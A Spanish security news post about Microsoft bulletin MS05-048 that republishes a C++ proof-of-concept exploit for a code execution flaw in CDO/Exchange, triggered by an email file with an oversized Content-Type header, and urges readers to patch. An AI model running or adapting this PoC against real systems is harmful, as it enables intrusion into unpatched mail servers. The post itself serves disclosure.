Exploit Ms-Windows (Boletin MS05-048) Ejecución de código en CDO (Exchange)


frsirt.com ha publicado el exploit (como prueba de concepto) del exploit que causa Ejecución de código en CDO (Exchange), por ello se deben actualizar los sistemas Windows a la brevedad.





//
// Microsoft CDO Proof of Concept Exploit by Gary O'leary-Steele <garyo at sec-1.com>
//
// Step 1.
//
// Create an E-mail named vuln.eml including a large "Content-Type:" header.
//
// Step 2.
//
// Compile with -GX option
//

#import <msado15.dll> no_namespace rename("EOF", "adoEOF")
#import <cdosys.dll> rename_namespace("CDO")

#include <stdio.h>

int main()
{

CoInitialize(0);
try
{
CDO::IMessagePtr spMsg(__uuidof(CDO::Message));
_StreamPtr spStream(spMsg->GetStream());
spStream->Position = 0;
spStream->Type = adTypeBinary;
spStream->LoadFromFile("vuln.eml");
spStream->Flush();

for(long i = 1; i <= spMsg->BodyPart->BodyParts->Count; i++)
{
CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i];
_variant_t v =
spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;
}

}
catch(_com_error &e)
{
printf("COM error[0x%X, %s]\n", e.Error(),
(LPCTSTR)e.Description());
}
catch(...)
{
printf("General exception\n");
}

CoUninitialize();

return 0;
}

CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i];
_variant_t v =
spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;

 

Fuente:
frsirt.com



Otras noticias de interés:

Problemas con los accesos directos de Windows
Se ha detectado un problema en el manejo de accesos directos de Windows. Si se crea uno de forma maliciosa, puede provocarse la caída del explorer.exe (shell32.dll). Esta vulnerabilidad ha sido probada en 98, 2000 Server y 2000 Professional....
Microsoft lanzó 247 parches en el 2010
Microsoft lanzó este 2010 un total de 106 boletines de seguridad para solucionar un total de 247 vulnerabilidades, 57 más que el pasado año....
Los fallos en software de código abierto se solucionan antes que en los de código propietario
Para quien no lo sepa: si te dan a elegir entre un desarrollo de código propietario y otro de código abierto, elige el segundo, porque tardarás menos, incluso días menos, en hacer bien tu trabajo....
El Derecho Informático Nº 10
El Número 10 (Diciembre 2011) de la Revista Digital ElDerechoInformático.comya está disponible....
100 millones de perfiles de Facebook filtrados en un torrent
Tanto lio por la privacidad en Facebook y 100 millones de usuarios que ni se preocuparon por cambiar su configuración. O esto al menos es lo que dejó en evidencia Ron Bowes de Skull Security al compilar gracias a un script los datos de 100 millones...
Opera 10.10 disponible
Opera Software acaba de presentar la última actualización de su reconocido navegador Opera, en la que básicamente se incluyeron una serie de mejoras respecto a la versión 10 presentada hace algunos meses....
Millones de routers vulnerables a ataques
Una presentación que se realizará en la conferencia de seguridad Black Hat de este mes, supuestamente demostrará como millones de routers caseros, de populares marcas como Netgear, Linksys y Belkin, sufren de una vulnerabilidad que le permite a cu...
Vulnerabilidades en plataforma educativa Moodle
Se han publicado 15 boletines de seguridad que afectan a la plataforma Moodle. Las vulnerabilidades permiten saltar restricciones, ejecutar código arbitrario, revelar información sensible, afectar la integridad de los datos, realizar ataques XSS, C...
Alerta ante el virus Ares, sucesor del virus ZeuS
Expertos de G Data advierte de la aparición de un nuevo troyano, de nombre Ares, con un diseño modular similar a ZeuS....
El 73% de los dispositivos de red funciona con vulnerabilidades de seguridad
El dato revela el riesgo al que las organizaciones están expuestas a la hora de sufrir algún tipo de ataque informático....

Brindanos
un o una


Redes Sociales

Publicidad


Gana Bitcoins desde tu casa

Categorías


Planeta Vaslibre

Blog Roll




Nube de tags

  • anonimato
  • anonimo
  • antivirus
  • apache
  • blog
  • boletin
  • bsd
  • bug
  • cdo
  • centos
  • chrome
  • cifrado
  • codigo
  • computer
  • debian
  • ejecucion
  • exchange
  • exploit
  • exploits
  • fedora
  • fice
  • firefox
  • forense
  • freebsd
  • gentoo
  • github
  • gnome
  • gnu
  • gpl
  • gtk
  • hack
  • hacking
  • hosting
  • informatica
  • internet
  • isos
  • libre
  • licencias
  • linux
  • linuxmint
  • lxde
  • micros
  • mint
  • mit
  • mozilla
  • mysql
  • noticia
  • opensource
  • pgp
  • php
  • sabayon
  • seguridad
  • system
  • tecnologia
  • thunar
  • thunderbird
  • tor
  • troyanos
  • tware
  • ubuntu
  • underground
  • vaslibre
  • virus
  • viserproject
  • vivaldi
  • vulnerabilidades
  • web
  • website
  • windows
  • xanadu
  • xfce
  • xombra